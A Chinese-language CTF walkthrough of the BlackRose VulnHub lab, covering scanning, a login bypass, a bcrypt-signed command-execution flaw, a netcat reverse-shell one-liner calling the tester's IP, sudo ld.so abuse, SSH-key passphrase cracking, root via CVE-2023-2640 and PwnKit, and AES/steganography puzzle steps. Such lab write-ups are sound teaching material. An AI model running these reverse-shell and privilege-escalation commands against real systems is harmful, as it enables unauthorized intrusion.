BlackRose 靶机

BlackRose 靶机

信息收集

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.21  

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
1
2
3
4
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ mysql 192.168.1.21 -u root -p 
Enter password: 
ERROR 2002 (HY000): Can't connect to local server through socket '/run/mysqld/mysqld.sock' (2)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.1.21          

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d1:9b:10:88:15:e9:7a:c4:1a:29:07:3c:21:87:c4:ac (RSA)
|   256 e3:50:0b:c9:e8:f1:68:7f:e7:cf:ec:de:7b:b9:20:a1 (ECDSA)
|_  256 55:0e:96:22:cc:50:20:d9:dd:c2:ff:5b:25:d0:d7:2b (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: BlackRose
|_Requested resource was login.php
3306/tcp open  mysql   MySQL (unauthorized)

Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.1.21 

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
| http-enum: 
|_  /login.php: Possible admin folder
3306/tcp open  mysql

Web 渗透

打开页面,只有登录框,尝试了一下简单的 SQL 注入,没成功。尝试注册个新用户,看看有没有越权之类的逻辑漏洞,没发现。

登陆后看起来有个执行命令的地方,但我并不是 admin,无法执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo dirsearch -u http://192.168.1.21  

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Target: http://192.168.1.21/

[05:27:16] Starting: 
[05:27:17] 301 -  309B  - /js  ->  http://192.168.1.21/js/                                                
[05:27:19] 200 -   21B  - /404.php                                          
[05:27:31] 301 -  310B  - /css  ->  http://192.168.1.21/css/                
[05:27:31] 302 -    0B  - /database.php  ->  404.php                        
[05:27:33] 200 -   21B  - /footer.php                                       
[05:27:34] 200 -   21B  - /header.php                                       
[05:27:34] 301 -  313B  - /images  ->  http://192.168.1.21/images/          
[05:27:34] 302 -    0B  - /images/  ->  ../404.php                          
[05:27:35] 301 -  310B  - /img  ->  http://192.168.1.21/img/                
[05:27:35] 302 -    0B  - /index.php  ->  login.php                         
[05:27:35] 302 -    0B  - /index.php/login/  ->  login.php                  
[05:27:36] 302 -    0B  - /js/  ->  ../404.php                              
[05:27:37] 200 -    1KB - /login.php                                        
[05:27:37] 302 -    0B  - /logout.php  ->  404.php                          
[05:27:43] 200 -    2KB - /register.php                                     
[05:27:44] 403 -  277B  - /server-status/                                   
[05:27:44] 403 -  277B  - /server-status
[05:27:49] 302 -    0B  - /vendors/  ->  ../404.php

目录爆破未发现新的暴露面。

尝试了弱口令爆破,失败。对执行命令的接口使用 Burp 自带的字典进行 FUZZ,失败。

登录绕过

在这里卡了蛮久的,没什么思路,就跑去看 WP 里,里面提到了登录绕过,谷歌搜索 login bypass

Login Bypass - HackTricks

在 passwd 后加 [] 绕过登录成功,登陆到了 admin 用户

反弹 shell

indexcsrf 过期得蛮快的,如果提示 timeout 的话就刷新下网页,似乎只能使用 whoami 命令,别的命令会提示

把 Signature 的值复制下来,john 爆破一下

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt  
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whoami           (?)

似乎 Signature 的值必须是命令的加密值,哈希是 Bcrypt 算法,随便找了个在线网站Bcrypt-Generator.com - Generate, Check, Hash, Decode Bcrypt Strings,得到了 id 的加密值,验证了自己的猜测。

找个反弹 shell 的代码,可以多换几个试试,有的成功有的失败

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.101 443 >/tmp/f

通过在线网站得到了加密后的值

1
$2a$10$v49VHIVsiGtoUeTaZdbTuuaWpnkS92o5/G5MZaHloHkFWRro7buoq

在网页中直接修改源代码,再点击 Run

反弹 shell 成功。需要备注的是,这里可能需要反复换反弹 shell 的代码,有些反弹代码是不成功的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.21] 51246
bash: cannot set terminal process group (1121): Inappropriate ioctl for device
bash: no job control in this shell
www-data@BlackRose:/var/www/html$ whoami
whoami
www-data
www-data@BlackRose:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@BlackRose:/var/www/html$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:98:92:98 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.21/24 brd 192.168.1.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe98:9298/64 scope link 
       valid_lft forever preferred_lft forever
www-data@BlackRose:/var/www/html$ uname -a
uname -a
Linux BlackRose 4.15.0-69-generic #78-Ubuntu SMP Wed Nov 6 11:30:24 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
www-data@BlackRose:/var/www/html$ sudo -l      
sudo -l
Matching Defaults entries for www-data on BlackRose:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on BlackRose:
    (delx : delx) NOPASSWD: /bin/ld.so

sudo -l 感觉得到了有用的信息

gtfobins 中找到了利用手法,

这个内核版本感觉可以内核提权。先信息收集

1
2
3
4
5
6
7
8
9
10
11
12
www-data@BlackRose:/var/www/html$ sudo -u delx /bin/ld.so /bin/bash -p
sudo -u delx /bin/ld.so /bin/bash -p
whoami
delx
id
uid=1002(delx) gid=1002(delx) groups=1002(delx)
ls -alih /home
total 16K
1179649 drwxr-xr-x  4 root     root     4.0K Nov  9  2019 .
      2 drwxr-xr-x 24 root     root     4.0K Nov 13  2019 ..
1179652 drwxr-xr-x  6 delx     delx     4.0K Dec  5  2019 delx
1183766 drwx------  5 yourname yourname 4.0K Dec  5  2019 yourname

先看看网站根目录吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ls -alih
total 76K
 266386 drwxr-xr-x  8 root root 4.0K Jul 11  2020 .
3153970 drwxr-xr-x  3 root root 4.0K Nov  7  2019 ..
 266400 -rw-r--r--  1 root root   37 Nov 13  2019 404.php
 262153 -rw-r--r--  1 root root 1.2K Dec  5  2019 RL.php
 262150 -rw-r--r--  1 root root 1.2K Nov 26  2019 RP.php
 262148 -rw-r--r--  1 root root  956 Nov 26  2019 Rx.php
 397314 drwxrwxr-x  5 root root 4.0K Oct 22  2019 bootstrap
 793475 drwxrwxr-x  2 root root 4.0K Nov 15  2019 css
 266801 -rw-r--r--  1 root root 1.4K Nov 10  2019 database.php
 397308 -rw-r--r--  1 root root  303 Dec  1  2019 footer.php
 262152 -rw-r--r--  1 root root  364 Dec  1  2019 header.php
 924595 drwxrwxr-x  2 root root 4.0K Oct 22  2019 images
 397310 drwxrwxrwx  2 root root 4.0K Dec  5  2019 img
 262151 -rw-r--r--  1 root root 3.6K Nov 26  2019 index.php
 666484 drwxrwxr-x  2 root root 4.0K Nov 13  2019 js
 397363 -rw-rw-r--  1 root root 1.2K Nov 26  2019 login.php
 397364 -rw-r--r--  1 root root  198 Dec  1  2019 logout.php
 397309 -rw-rw-r--  1 root root 1.3K Dec  1  2019 register.php
 793409 drwxrwxr-x 20 root root 4.0K Oct 22  2019 vendors

网站根目录中有 database.php 文件,其中包含数据库密码

1
2
3
4
define("user", "root");
define("pass", "howareyoubuddy");
define("data", "Dw");
define("host", "127.0.0.1");

尝试用此密码切换登录,失败

1
2
3
4
5
6
7
8
9
10
11
12
13
cd ~
ls -alih
total 36K
1179652 drwxr-xr-x 6 delx delx 4.0K Dec  5  2019 .
1179649 drwxr-xr-x 4 root root 4.0K Nov  9  2019 ..
1183918 lrwxrwxrwx 1 delx delx    9 Dec  3  2019 .bash_history -> /dev/null
1179654 -rw-r--r-- 1 delx delx  220 Nov  7  2019 .bash_logout
1179655 -rw-r--r-- 1 delx delx 3.7K Dec  3  2019 .bashrc
1183761 drwx------ 2 delx delx 4.0K Nov  7  2019 .cache
1183759 drwx------ 3 delx delx 4.0K Nov  7  2019 .gnupg
1575430 drwxrwxr-x 3 delx delx 4.0K Dec  1  2019 .local
1179653 -rw-r--r-- 1 delx delx  807 Nov  7  2019 .profile
1183756 drwx------ 2 delx delx 4.0K Nov  7  2019 .ssh

进入用户家目录中看到了 .ssh 文件,进入看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
cd .ssh
ls -alih
total 20K
1183756 drwx------ 2 delx delx 4.0K Nov  7  2019 .
1179652 drwxr-xr-x 6 delx delx 4.0K Dec  5  2019 ..
1183764 -rw-r--r-- 1 delx delx  390 Nov  7  2019 authorized_keys
1183757 -rw------- 1 delx delx 1.8K Nov  7  2019 id_rsa
1183758 -rw-r--r-- 1 delx delx  390 Nov  7  2019 id_rsa.pub
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,EC100EF5AB09B47D4E9774BD2A5263F7

66+ga/da/X5dODshv+050zni0avb5zvutVYj04tlApmncz+Yorcgu5EmWzFvKdZ9
PWsr69FOQ9OUDhYc7IQFHByETTh/lEGJbN/DiQhHuhaYTBysIs68TIELh5GJ+dL/
ZPTEywHi5kh7m5FrwPHoQjsxXdWycQWrknE4WJElDm7mkggZJTFga6rH9X2G51IE
AgGUPEIS976cYKW/+L82LvAiPsgRe/FDwxI325Pa6zdbnE3ITXNAKaSqdl0cHuUX
cZBq4x9D/YFT2ptvegsnqaTdl401GZQrxd67GwzOth8jn7wAzu9NsMQAbJzuW2mp
VbZEAIaWeOVaJyAQWAOKtYDVsFaBN5G2JpzLrQngN6VHc8AVBRBd5FlDsc+s/ROU
eaP2pt/jU9F3CqAO8ezkDm9H7olhJJ8f9HXWrsI/Rw/fZZbrxUmh3F8syLHpHd2r
/M/8ABMxYStpuRNo7dFNEvwY/lzdqlaRj5lDjvjKPQ14kJeGukKVY45oqP0FVeF4
VPP4B0mZtejvp9hpt5gX3sSdzfWWstYACSfilMlCQLDpsZylqYIPy19mLeEMZknu
G0CDxYdbFpxiTWE9tJhreODK282IDmGwwcxP/XMIKkP/qZD3HaCBYIYYWgnegqSd
rPRhWA67Fbl499+6Gt1uo/JVjcM8dcj+q4XaQg/cbXGDzaRFUAqbTkc4qiFHHoiG
4dOAGgQICJ6I4dF63R2CRi28ruD7X+2UMaaitkP/tqNyygPq5qpQOtTtoqBMyKD2
4oUSABGeNGHRusDUmmSUIgwxLjO9Oc0mHzzdsN/phoOO24I+NJepuaaW9R9SX3gL
/pDKiYqXc5XIoW9n1EvP/QeS6mbeDSLMExp72dp2sf53uZO77N+eBHgULQagkR7n
8cq7LHuR4N369t0hkff01J7G6oNnY/OIYANWSEzl9gB0XMp1LVGEPtSvxYAi2ifU
qmml6KE1IX+O3sZVzKPIm8YxMp2CbjjFloSHfWA+EYpmbq/4yUs92zRFfkmDr6v8
LWeJzYPMrAv9mtarqjqM12YjybBl4sinfLsuGsEjZifTz9YYGrcOea0pkEOap+ji
wB+sTtOjJzaQ6jGUJvnR7krGdYnHiGbgav3PqKzeOnYfNG1sqRyTY4lkYB5Y9+ta
3EwY5PzyjwYBrpDryvdL9ssV89CTAK4JURglrEAGRcbjs7Fg21pxXjNmYUbr2Aag
SlcwLYO3cDOpai4rXsOnGx/34KRgIGdWpgusQh1Z9HXD3hDbcsPbAISRfpc3pGVL
WMWuTqYJNQMW3TRvEqrHqyfPLuFRAUTWy+8yBlWYvjeQmihfJ9Xg2xtoEdQmQVa4
GDnH58J0zUmOowPRe/0TKyOMsfs1f20p96qo2eqR6bpHjkRCWMTx8CUTyS1CVo6X
gH8JeI1sbhffdLJY3rPPzLquuqRlLJFBWtfQe6tCGNpLLY3e7o8EUmYdIwEm6jrI
0NFosxoPtZJz2cw/m5jzPCH0wIu7yDLLvBwhkK4XpZa/gNIy+TGjCLonmbU9vd7f
/qyR/XhYI1i3lxBF4JGLL8FoEFCfasuZZVyjvwjlUbHliroTxKupWHvhYyPjKo7f
-----END RSA PRIVATE KEY-----

得到了 ssh 私钥,尝试使用此私钥 ssh 登录

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ chmod 400 id_rsa     
                                                                                                                    
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ssh -i id_rsa delx@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can\'t be established.
ED25519 key fingerprint is SHA256:wc/f/+tP1y7HbxIJA9NHM2yXxP+Hm+8B/vKQk5XAsT4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':

需要 passphrase,那就 john 上场

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ssh2john id_rsa > sshhash

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ sudo john sshhash --wordlist=/usr/share/wordlists/rockyou.txt                                         
[sudo] password for kali: 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
doggiedog        (id_rsa)     
1g 0:00:00:00 DONE (2023-10-12 09:44) 11.11g/s 3454Kp/s 3454Kc/s 3454KC/s dolcegabanna..dodgers9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

使用 doggiedog 作为私钥的口令来 ssh 登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ssh -i id_rsa delx@192.168.1.21                              
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-69-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Oct 12 13:44:22 UTC 2023

  System load:  0.0                Processes:             105
  Usage of /:   11.0% of 48.96GB   Users logged in:       0
  Memory usage: 72%                IP address for enp0s3: 192.168.1.21
  Swap usage:   0%


201 packages can be updated.
153 updates are security updates.


Last login: Thu Dec  5 21:57:42 2019 from 192.168.1.123

尝试口令是否是此用户的密码

1
2
3
4
5
delx@BlackRose:~$ sudo -l
[sudo] password for delx: 
Sorry, try again.
[sudo] password for delx: 
sudo: 1 incorrect password attempt

并不是。

1
2
3
4
5
delx@BlackRose:~$ gcc --version
gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
Copyright (C) 2017 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

有 gcc 啊,那可以尝试内核提权。接下来我使用 linpeas 进行了信息收集,查看了网站根目录、shadow 文件权限、用户家目录、一些特别的文件与压缩包。

唯一的收获是 /usr/local/.../showPassword 比较特殊,但是不知道怎么去提取有效信息,strings 命令看到了奇怪的字符,但是输入之后还是没成功。耐心-1,-1,-1

内核提权

尝试内核提权,先尝试了一个比较新的 EXP:CVE-2023-2640,成功提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
delx@BlackRose:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
uid=0(root) gid=1002(delx) groups=1002(delx)
delx@BlackRose:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
mkdir: cannot create directory ‘l’: File exists
mkdir: cannot create directory ‘u’: File exists
mkdir: cannot create directory ‘w’: File exists
mkdir: cannot create directory ‘m’: File exists
root@BlackRose:/tmp# cd /root
root@BlackRose:/root# ls -liah
total 36K
2097153 drwx------  6 root root 4.0K Jul 11  2020 .
      2 drwxr-xr-x 24 root root 4.0K Nov 13  2019 ..
2097158 lrwxrwxrwx  1 root root    9 Dec  3  2019 .bash_history -> /dev/null
2097154 -rw-r--r--  1 root root 3.1K Dec  3  2019 .bashrc
2097164 drwx------  2 root root 4.0K Dec  5  2019 .cache
2097162 drwx------  3 root root 4.0K Nov  7  2019 .gnupg
2097159 drwxr-xr-x  3 root root 4.0K Nov  7  2019 .local
2097155 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
2097168 -rw-r--r--  1 root root  511 Jul 11  2020 root.txt
2097156 drwx------  2 root root 4.0K Sep  7  2019 .ssh
root@BlackRose:/root# cat root.txt 
     _                   _                           _                   
    | | _____      _____| |   __      ____ _ ___    | |__   ___ _ __ ___ 
 _  | |/ _ \ \ /\ / / _ \ |   \ \ /\ / / _` / __|   | '_ \ / _ \ '__/ _ \
| |_| |  __/\ V  V /  __/ |    \ V  V / (_| \__ \   | | | |  __/ | |  __/
 \___/ \___| \_/\_/ \___|_|     \_/\_/ \__,_|___/   |_| |_|\___|_|  \___|
                                                                The box made by Jewel                               

7dcbcf000f38c8d2c0024011899ec84e

I thank you so much for playing - Jewel 😀

然后尝试了 linpeas 推荐的第一个 EXP——cve-2021-4034,成功提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
delx@BlackRose:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.c  cve-2021-4034.sh  dry-run  LICENSE  Makefile  pwnkit.c  README.md
delx@BlackRose:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
delx@BlackRose:/tmp/CVE-2021-4034-main$ ls
 cve-2021-4034     cve-2021-4034.sh   gconv-modules   LICENSE    pwnkit.c    README.md
 cve-2021-4034.c   dry-run           'GCONV_PATH=.'   Makefile   pwnkit.so
 delx@BlackRose:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),1002(delx)

设计的攻击路径

主要参考 BlackRose: 1-VulnHub (qq.com)

之前已经发现了 /usr/local/.../showPassword 文件,但是不知道如何处理,这里我们需要简单的逆向手段,拖进 IDA 里发现了一连串可能是用于判断的字符。gqSFGqAJ

1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ./showPassword       
root@username:~# gqSFGqAJ
Good luck buddy :)

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ ./showPassword
root@username:~# 123
person who wrote me,he says it's wrong 😀

JqT/3t/ucYLw/dlb6c5PzmQM9lRYjuRIPgCmcHP+RTE= 看起来是加密/编码后的字符串

后边所用到的 AES 解密是需要去猜测的,一般有 key 的话就是对称加密算法,常见的对称加密算法有 DES、3DES、Blowfish、IDEA、RC4、RC5、RC6 和 AES。
这个没什么捷径,只能尝试去一个一个猜解。
同时秘钥长度为8,转换成字节就是32位,通过这个信息缩小些范围。

使用在线网站 AES encryption 进行解密

RkZiPVkvxykJVOmxBmitBPeJXqFuxM

我比较疑惑的一个点是 AES 中其实有额外的参数,比如:填充方式等,这个网站实际上没有显示出这些参数,那么如果我想真正自己去解析 AES,又该怎么做呢?

来自红队笔记解答的摘要:

第一个问题:怎么判断出是 AES 加密的结果?
在本例中其实能想到 gqSFGqAJ 是 key 也不容易,因为需要有补全的想象力,是卡自己一段时间,四处突围地想和尝试才可能想到的。更多的是对加密算法使用习惯和频率的熟悉才能在思维上让你想到
第二个问题:如何使用 AES 解密?
简化思考的方式,aesencryption.net 这个站点现在也是可用的,也是如你看的 wp 能够解出明文密码的,靶机作者应该当初创建靶机就用这个站点生成的,然后因为 aesencryption.net 也比较通用,做这台靶机的用户网上一搜、一试也就通了
aes 加密加密涉及到诸多参数,而它都默认甚至忽略了。至少涉及这些问题:

  1. AES 密文和明文一般需要填充,用什么机制?
  2. key 位数怎么确定,不足需要怎么填充?是有常用机制,但也不唯一。
  3. 最重要的,aesencryption.net 没有 iv 的选项,是都用了不用 iv 的 ECB 模式吗?
    逆向了 aesencryption.net,对应上面问题的答案是:
  4. 用的 pkcs #7 。
  5. key 要用0补足32个字节,256位。
  6. 用的 cbc,而且 iv 用的是12345678b0z2345n 这种很独特的、随机的值。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import base64  
from Crypto.Cipher import AES  
from Crypto.Util.Padding import unpad  
  
def decrypt_aes(string_from_passwordapp, key_text, iv_re_from_aesencryption):  
    """  
    使用AES解密Base64编码的密文。  
     
    参数:  
    - string_from_passwordapp (str): 从密码应用程序获得的Base64编码的密文。  
    - key_text (str): 用于AES的密钥。  
    - iv_re_from_aesencryption (str): 从AES加密应用程序获得的初始化向量。  
     
    返回:  
    - str: 解密后的明文。  
     
    异常:  
    - ValueError: 解密失败或Base64解码失败。  
    """  
     
    # 确保密钥长度为32字节,适用于AES-256  
    key = key_text.ljust(32, '\0').encode()  
    iv = iv_re_from_aesencryption.encode()  
  
    try:  
        # 解码从密码应用程序获得的Base64密文为原始的二进制格式  
        encrypted_data = base64.b64decode(string_from_passwordapp)  
         
        # 使用AES进行解密  
        cipher = AES.new(key, AES.MODE_CBC, iv)  
        decrypted_text = cipher.decrypt(encrypted_data)  
  
        # 使用PKCS7解填充  
        return unpad(decrypted_text, AES.block_size, style='pkcs7').decode()  
     
    except (ValueError, AttributeError):  
        raise ValueError("解密失败或Base64解码失败。")  
  
if __name__ == "__main__":  
    # 提供的数据  
    key_text = "gqSFGqAJ"  
    iv_re_from_aesencryption = "12345678b0z2345n"  
    string_from_passwordapp = "JqT/3t/ucYLw/dlb6c5PzmQM9lRYjuRIPgCmcHP+RTE="  
  
    try:  
        plain_text = decrypt_aes(string_from_passwordapp, key_text, iv_re_from_aesencryption)  
        print(plain_text)  
    except ValueError as e:  
        print(e)

可能出现的问题和解答:

在上述知识的基础上,gqSFGqAJ000000000000000000000000 作为 utf8 格式的 key 输入,还是失败了。因此我先是尝试添加了一层 Hex,确认了 base64 解码结果没问题,同时指定 AES Decrypt 的输入为 hex,这样就可以确认是 AES Decrypt 层出了问题,而可控参数实际上就只有 Key 和 IV,又经过不断的尝试,我得到了以下成功的结果

1
[https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D)',true,false)AES_Decrypt(%7B'option':'Hex','string':'677153464771414a000000000000000000000000000000000000000000000000'%7D,%7B'option':'UTF8','string':'12345678b0z2345n'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=SnFULzN0L3VjWUx3L2RsYjZjNVB6bVFNOWxSWWp1UklQZ0NtY0hQK1JURT0

将 key 的值由 UTF8的 gqSFGqAJ000000000000000000000000 更改为 hex 的 677153464771414a000000000000000000000000000000000000000000000000 就能成功,又翻查了一些资料,我判断是当输入 utf8,数字 0 在 utf8 编码中的二进制表示与其 ASCII 编码相同,为 00110000,如果想真正表示二进制的00000000又会遇到新的问题,也就是空字节的问题,所以在 CyberChef 中对于 key 需要补足0的情况只能使用 hex 作为 key 的输入。密码工具箱的验证:

这里还有个我们忽略的地方,也就是这个字符串的用处。打开网页时有个背景图,我们,将背景图片下载到本地查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ exiftool background-image.jpg 
ExifTool Version Number         : 12.57
File Name                       : background-image.jpg
Directory                       : .
File Size                       : 181 kB
File Modification Date/Time     : 2019:12:05 06:57:08-05:00
File Access Date/Time           : 2023:10:12 09:01:47-04:00
File Inode Change Date/Time     : 2023:10:12 09:01:47-04:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : inches
X Resolution                    : 300
Y Resolution                    : 300
Image Width                     : 960
Image Height                    : 640
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 960x640
Megapixels                      : 0.614
                                                                                                                    
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ steghide info background-image.jpg 
"background-image.jpg":
  format: jpeg
  capacity: 10.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
steghide: could not extract any data with that passphrase!

steghide 提示需要 passphrase 才能提取信息,将上面解密得到的字符作为 passphrase 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ steghide info background-image.jpg
"background-image.jpg":
  format: jpeg
  capacity: 10.9 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
  embedded file "password":
    size: 31.0 Byte
    encrypted: rijndael-128, cbc
    compressed: yes

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ steghide extract -sf background-image.jpg
Enter passphrase: 
wrote extracted data to "password".

┌──(kali㉿kali)-[~/Documents/blackrose]
└─$ cat password    
s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR

对于字符 s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR 又需要再一次尝试加密与编码

这个密码看起来依旧是加密的,经过查找,发现是 rot47

关于这个描述和判断,比较疑惑,在一篇博客中找到了一种途径。BlackRose: 1 Walkthrough (Vulnhub) | by Shubham Kumar | Medium

使用的工具是 oreosES/autodecoder: AutoDecoder tool for CTFs (github.com)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(kali㉿kali)-[~/tools/autodecoder]
└─$ python3 audodecoder.py --message "s)M8Z=7|8/&YY-zK5L$.w3Su'Q@nGR"

atbash > atbash: SMZYYZKLWSUQNGR                                                                                    
atbash > caesar: KQDEEDSRGKIMPWL                                                                                    
atbash > rot13: UANOONCBQUSWZGV                                                                                     
atbash > rot47: w}pqqp!~swuy|%x                                                                                     
caesar > atbash: YKXYYRMLUEWGDQF                                                                                    
caesar > caesar: E)S8F=7|8/&EE-LQ5R$.I3YG'W@ZMX                                                                     
caesar > rot13: O)C8P=7|8/&OO-VA5B$.S3IQ'G@JWH                                                                      
caesar > rot47: qX!grlfMg^Uqq\x}d~S]ub'sV%o(y&                                                                      
rot13 > atbash: UANOONCBQUSWZGV                                                                                     
rot13 > caesar: O)C8P=7|8/&OO-VA5B$.S3IQ'G@JWH                                                                      
